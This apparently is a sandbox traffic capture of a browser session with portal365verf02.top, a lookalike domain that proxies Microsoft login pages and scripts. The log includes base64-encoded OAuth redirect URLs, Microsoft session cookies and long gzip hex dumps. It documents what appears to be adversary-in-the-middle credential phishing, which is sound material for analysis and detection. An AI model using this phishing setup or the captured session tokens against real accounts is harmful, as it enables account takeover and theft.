esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-01-15 19:06:19 UTC	1724	IN	HTTP/1.1 404 Not Found Cache-Control: private Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 0a26b5f8-4c98-463e-a974-fb0a223b2b00 x-ms-ests-server: 2.1.19870.3 - FRC ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-hyhpolFflHrUid46NPAlBg' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All Date: Wed, 15 Jan 2025 19:06:19 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:19 UTC	1255	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1 Host: portal365verf02.top Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-01-15 19:06:19 UTC	1391	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:19 GMT Content-Type: application/x-javascript content-length: 142542 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 12 Dec 2024 21:33:52 GMT ETag: 0x8DD1AF4AC8A4BB0 x-ms-request-id: b10165f6-301e-004f-14ad-66b202000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20250115T190619Z-179f9cc895cb8f8nhC1DUSy8bn0000000ht0000000007u5a x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-15 19:06:19 UTC	14993	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16 Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9\|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO\|T06 yx*8pT"1
2025-01-15 19:06:19 UTC	1391	IN	Data Raw: e4 de a5 8d fb 23 66 71 78 61 8a e5 b0 5e 29 97 d4 b6 d9 b6 d8 b2 4e cf 06 83 8f ce 33 c5 f4 3f 93 ab 0e 70 a0 62 ed 80 e4 d0 b5 d0 56 fa 11 51 f1 70 08 c4 35 fc 75 d8 03 2a d2 c7 97 76 2c 02 25 7d f0 a3 e4 ce 03 69 be 47 a1 67 b9 d9 92 c9 48 46 05 d3 36 86 a6 8c 7c 3d c7 c8 e0 04 e9 67 a9 d0 6f 2d 24 a5 f3 c7 10 cc 47 b2 1c 90 94 f8 15 5b d7 64 62 46 39 8c 5b 78 34 5a 2c 04 af 62 50 2d 6a 1b 6e c0 91 b2 18 37 ab 1c 88 b4 84 d1 a2 7d 17 71 48 73 18 68 d1 62 2a f0 52 e0 27 0c a3 e5 0f 6f b4 49 66 ed f3 ed 2d 4c 17 44 30 86 9b e9 d6 9b 5f 20 a5 53 c1 c3 4f 62 91 38 f3 64 b2 b1 cb 7b 65 2e a2 69 3f c0 55 1c 2f 5f e0 db c6 e3 e3 e3 06 52 c6 c6 3c 9a 0a 06 21 1a c1 dd 1c ca 97 e3 3c a7 dc d8 50 8c 9b b2 21 8c 94 7b 1f cf 71 57 43 c6 81 5b 72 47 32 72 88 07 83 Data Ascii: #fqxa^)N3?pbVQp5uv,%}iGgHF6\|=go-$G[dbF9[x4Z,bP-jn7}qHshbR'oIf-LD0_ SOb8d{e.i?U/_R<!<P!{qWC[rG2r
2025-01-15 19:06:19 UTC	7575	IN	Data Raw: 05 f8 97 ee 5d 31 0b a7 17 56 8d 24 25 02 4a 60 b7 86 81 b7 ad 24 f5 d2 3c 67 0d 38 21 d1 da e9 e8 2f 2f 2f 91 76 66 54 1d 35 34 eb f9 01 e6 38 94 7d 53 1b 9a c4 75 aa ae 24 0b d9 0f 39 65 e0 75 f7 1f c2 6f ff 6d af ee d2 d3 a5 64 57 b2 04 27 d2 ce 9e aa e3 94 88 dd 41 89 7e e4 df fb a0 03 b1 72 85 1b d5 71 6a fb fd 4e 2d 3f c5 c3 24 9c 19 ab d0 2e 6f 5f e3 cc c3 c3 ff b4 1f 2b 9a 89 67 62 fd 10 9e 72 cd 50 5b c1 ff bf 6d 0b 1e d3 f5 97 db 22 41 f9 3e b5 1c 09 ac 10 f5 cf 8a 4f 84 ce 1f 41 19 7d 65 0d b5 93 ee d2 e8 da 4b 8d 27 92 e3 4b e7 50 fb 5a 12 88 aa 61 80 0a e3 fb 60 86 95 97 c4 a1 92 c4 e1 65 a2 24 71 a8 4b 62 d3 ca a4 84 e3 55 0d f5 6c c8 0c de a0 06 72 c8 a5 5a 75 b8 b2 2c 2a 46 72 8a ec 38 e9 3d c0 02 4b 89 19 68 3f 50 ee cf 02 fa f1 6c 54 f3 Data Ascii: ]1V$%J`$<g8!///vfT548}Su$9euomdW'A~rqjN-?$.o_+gbrP[m"A>OA}eK'KPZa`e$qKbUlrZu,*Fr8=Kh?PlT
2025-01-15 19:06:19 UTC	8809	IN	Data Raw: b7 b9 77 ef 6f db 48 d2 46 ff 3f 9f 82 c2 fa 67 03 21 04 4b 4e 32 93 80 46 f8 73 64 7b e2 4c 7c 59 4b 4e 32 23 6b b4 20 01 4a b0 28 80 03 80 b2 35 12 bf fb a9 a7 aa bb d1 b8 50 76 66 e7 9c f7 9d dd 58 20 d0 68 f4 b5 ba ae 4f d9 cf fc 3a f8 14 43 87 ce 8c 5d e8 a2 79 f3 39 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 51 1c 68 e9 4b 4c cc 44 11 79 68 de 44 37 5d 9a 0e e0 ab 2d dc 0b 35 6e e3 7f 6a ad 46 3e 16 fa a2 8f 2a 4d b4 15 89 34 04 48 ee ee a2 b0 76 ff a1 9a db 47 39 13 f8 ad 14 f7 8d 1e 3c ee f4 51 84 89 0f 5e c6 ca 83 47 c1 76 38 93 37 c7 47 27 fc 8c 8a bf 8e 3a 14 c8 4d 87 04 6a 98 ad e9 2d 8f 03 09 23 54 20 57 34 17 f4 3d 3c 69 91 2a 05 8a 3c 52 a7 62 7d 1e d7 23 a0 76 57 a3 65 Data Ascii: woHF?g!KN2Fsd{L\|YKN2#k J(5PvfX hO:C]y9TTQ!r&Bfw'6$HQhKLDyhD7]-5njF>M4HvG9<Q^Gv87G':Mj-#T W4=<i<Rb}#vWe
2025-01-15 19:06:19 UTC	16384	IN	Data Raw: f2 fb 53 ee 81 75 50 e6 42 b8 d4 e8 98 fb ad e1 71 79 89 b2 f7 cd 46 65 5f 72 44 eb da 1c 76 93 2e 13 a0 f7 a9 9c fb fa 57 9f 59 c8 aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 95 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a1 6d e9 d0 e1 76 7b fb dd 0f 3a e4 38 d5 44 0f 14 cf f0 4b fa 78 b3 d4 13 46 45 aa Data Ascii: SuPBqyFe_rDv.WYP_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p\|@16 p2#l&7fsq[M1&gM(P7A:mv{:8DKxFE
2025-01-15 19:06:19 UTC	795	IN	Data Raw: 68 b4 f9 f9 ee 17 1d dc c0 0a 71 b9 86 c1 14 0f 8c bf f3 a5 75 21 c9 0f 1d 36 2d 04 9b 6b 49 31 a0 c8 c2 60 02 c2 82 58 87 8c 58 07 a4 92 91 fc 11 f0 1f 28 c4 35 cb 22 ea 51 26 b7 ec 2d 09 d0 17 dc d3 ce 6c fd cc 26 4e 9f 38 f3 36 c6 f9 55 60 39 7b 63 07 d6 50 37 e3 1f 9a 0c b1 1b e4 38 72 46 ae b2 96 da a6 c2 d8 43 bc 31 08 8b fe ba ed 6d 37 d0 86 57 4f 1c c1 fe 06 3b cb 25 e3 45 ca 4a 23 c6 f0 c0 87 6e 9d 71 a1 9c a4 e3 e9 80 d7 71 fb fb 1e bb 9a e1 4c 1f aa b3 f6 54 eb a9 d2 da f8 a5 a4 1c 4e ac 3d a4 92 ed fc e5 be f2 ea 02 7f a9 18 4b 20 3d a8 ed 33 e8 65 a5 0d 4c 0a 93 99 78 4f a4 b2 cf 89 cf 2c 7b dc a5 fe d0 90 3c db 83 fa 6f 67 44 c7 1b 85 45 0d f8 59 36 ec 5a af 5e dd c6 79 e5 ae 51 e8 28 53 58 9f 4b d1 f3 37 d4 d2 dd 7c 52 75 8e 2a eb e3 5a 1b Data Ascii: hqu!6-kI1`XX(5"Q&-l&N86U`9{cP78rFC1m7WO;%EJ#nqqLTN=K =3eLxO,{<ogDEY6Z^yQ(SXK7\|Ru*Z

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:21 UTC	4581	OUT	GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXTHlVdHJtV0lERFE4WVdITjFJ [TRUNCATED] Host: portal365verf02.top Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AR8AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAAfAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEFfWmjkR_GzAYDvO4lGAIMzWpVc_PlZ-ozf6HQiq48f64FiPX3lFGiNrTu1VIml9tFq1YxnCwjLh5luX0UaBFQIcOLXSo71dbHPXGQl2vLxYgAA; esctx-vhNytzdk0nc=AQAB [TRUNCATED]
2025-01-15 19:06:21 UTC	3691	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Wed, 15 Jan 2025 19:05:21 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Link: <https://logincdn.msauth.net>; rel=preconnect; crossorigin, <https://acctcdn.msauth.net>; rel=preconnect; crossorigin, <https://acctcdn.msauth.net/>; rel=dns-prefetch, <https://acctcdnmsftuswe2.azureedge.net/>; rel=dns-prefetch, <https://acctcdnvzeuno.azureedge.net/>; rel=dns-prefetch, <https://logincdn.msauth.net/>; rel=dns-prefetch, <https://lgincdnvzeuno.azureedge.net/>; rel=dns-prefetch, <https://lgincdnmsftuswe2.azureedge.net/>; rel=dns-prefetch Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C530_BL2 x-ms-request-id: 52ee0142-c54a-4403-88b8-3d78400b2f30 PPServer: PPV: 30 H: BL02EPF0001D8AA V: 0 Strict-Transport-Security: max-age=31536000 Set-Cookie: MSPRequ=id=N&lt=1736967981&co=1; domain=portal365verf02.top; Secure; path=/; SameSite=None; HttpOnly Set-Cookie: uaid=c9d8adfb498b9c70ec4b25284edee691; domain=portal365verf02.top; Secure; path=/; SameSite=None; HttpOnly Set-Cookie: cltm=; expires=Thu, 30-Oct-1980 16:00:00 GMT; domain=portal365verf02.top; Secure; path=/; SameSite=None; HttpOnly Set-Cookie: MSCC=178.215.224.116-US; expires=Mon, 09-Feb-2026 19:06:21 GMT; domain=portal365verf02.top; Secure; path=/; SameSite=None; HttpOnly Set-Cookie: MSPOK=$uuid-7ff583c4-7f9b-41bc-b692-0d0a8fb8bc0c; domain=portal365verf02.top; Secure; path=/; SameSite=None; HttpOnly Set-Cookie: OParams=11O.DqW55xy!3yAo1ef5EHUAw!uOCFZtKvykXhH1G4sVq!x2uSelftyMjJfuKoKLcRyXyZHx2dsSk19XocT4E6255QlnsU1c5LPqFdkME3H4CJLXLfBcN5VMN5jxRqGLU64RqC325o3yKRzR0VqAUglIPbSo5Lj90hVFnu5UXOpbsphYc!AVWvF6SHUDGzLcuPrpAAnofBLY!u5U4RrbaOOhR3BT0VqQXJY0krFz9BjQJ1UoRDPaPR8trjYOLpaU3JStVlJ9GFwVVJFqO!tv1HHCbwd1M7HwQgwcxEZ5FYhcztOm7mS9DzaDf9SoYnl4FWQasVUuZZWRmIMCHakVyHjSNw1C2gLWzqAosK17FVsx2wnGWA4onAHb14RSVP7xE9rpb4!5cYmDt9n9LJ59iXD0QBWLlLaqZGhzoiZo4BldbaATsVdins88fve6KzRCP1gbZNsh5EU!iN3DiDkmiEJeWJTffFlTdGjwCkqEgVoIv3vK!PuePMI182r1BLFaFzwoi5kgSRc4gULDtCfbGIFZ5FpPvYs9kEK9kbbit2jhYDYLUCUKd8cDlyOpt96FOIJbPJEqzxy2TYQATj742HzhfdNMkmCSrnEzzIsIfH86HQZ!4ZVow9rBjLNR6rvi0!Dbl0OBUMjoFfSTY1EiuSHlP9DjTUEumvZXXBzWPrfJ5i4eqjqq0jviBXy4sUV0yFTLK4sL7JVuSi85cF3h2TfQoWjyFAVN1YdRW!8mneOF7I9gTVg7xGid3ixKfT4qds!I1DdOBd83GC0v3DKm3ufbTfU!slgswJzIEOtvjPlyODKt3qmymDcszPkQ!nYVj0wnpx6VcwmFbCGurb62SK9oGZtqRqBsnbo9bwli8miMPe4pws6KIkVSIMjeyXYf1HFNSgSSPxKV9Qcux5YIf8IqTe5EaEGavP13ml9yrPc5PAmfcqFV33n6O5XKBU4BxYDzqd!fnuP6qt7E!*lHSa6n [TRUNCATED] Date: Wed, 15 Jan 2025 19:06:21 GMT Connection: close content-length: 29408
2025-01-15 19:06:21 UTC	12693	IN	Data Raw: 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 53 65 72 76 65 72 49 6e 66 6f 3a 20 42 4c 30 32 45 50 46 30 30 30 31 44 38 41 41 20 32 30 32 34 2e 31 31 2e 31 39 2e 31 37 2e 35 32 2e 34 30 20 4c 6f 63 56 65 72 3a 30 20 2d 2d 3e 3c 21 2d 2d 20 50 72 65 70 72 6f 63 65 73 73 49 6e 66 6f 3a 20 43 42 41 2d 31 31 31 39 5f 31 37 33 30 30 31 3a 63 62 37 66 33 39 31 65 63 30 30 30 30 30 45 2c 20 32 30 32 34 2d 31 31 2d 31 39 54 31 37 3a 34 36 3a 34 33 2e 30 39 32 32 32 38 32 2d 30 38 3a 30 30 20 2d 20 56 65 72 73 69 6f 6e 3a 20 31 36 2c 30 2c 33 30 34 33 35 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html>... ServerInfo: BL02EPF0001D8AA 2024.11.19.17.52.40 LocVer:0 -->... PreprocessInfo: CBA-1119_173001:cb7f391ec00000E, 2024-11-19T17:46:43.0922282-08:00 - Version: 16,0,30435
2025-01-15 19:06:21 UTC	16384	IN	Data Raw: 65 64 35 62 2d 34 65 66 31 2d 38 64 33 63 2d 39 32 62 38 35 64 64 34 37 33 35 32 26 63 6f 6e 74 65 78 74 69 64 3d 36 33 33 34 46 46 32 42 45 44 33 32 39 36 44 35 26 6f 70 69 64 3d 45 45 31 32 39 31 31 31 34 44 33 46 38 34 37 38 26 62 6b 3d 31 37 33 36 39 36 37 39 38 31 26 73 72 75 3d 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 69 76 65 2e 63 6f 6d 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 25 33 66 63 6c 69 65 6e 74 5f 69 64 25 33 64 35 31 34 38 33 33 34 32 2d 30 38 35 63 2d 34 64 38 36 2d 62 66 38 38 2d 63 66 35 30 63 37 32 35 32 30 37 38 25 32 36 63 6f 62 72 61 6e 64 69 64 25 33 64 64 65 62 33 66 37 34 61 2d 65 64 35 62 2d 34 65 66 31 2d 38 64 33 63 2d 39 32 62 38 35 64 64 34 37 33 35 32 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 Data Ascii: ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&sru=https://login.live.com/oauth20_authorize.srf%3fclient_id%3d51483342-085c-4d86-bf88-cf50c7252078%26cobrandid%3ddeb3f74a-ed5b-4ef1-8d3c-92b85dd47352%26client_id%3
2025-01-15 19:06:21 UTC	331	IN	Data Raw: 65 6e 74 2e 77 72 69 74 65 28 63 2b 53 2b 75 29 29 3a 74 2e 67 5f 73 53 52 53 53 75 63 63 65 73 73 2b 3d 65 2b 22 7c 22 2b 69 2b 22 2c 22 29 7d 7d 5d 29 29 3b 76 61 72 20 67 5f 64 74 46 69 72 73 74 42 79 74 65 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 67 5f 6f 62 6a 50 61 67 65 4d 6f 64 65 20 3d 20 6e 75 6c 6c 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 20 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 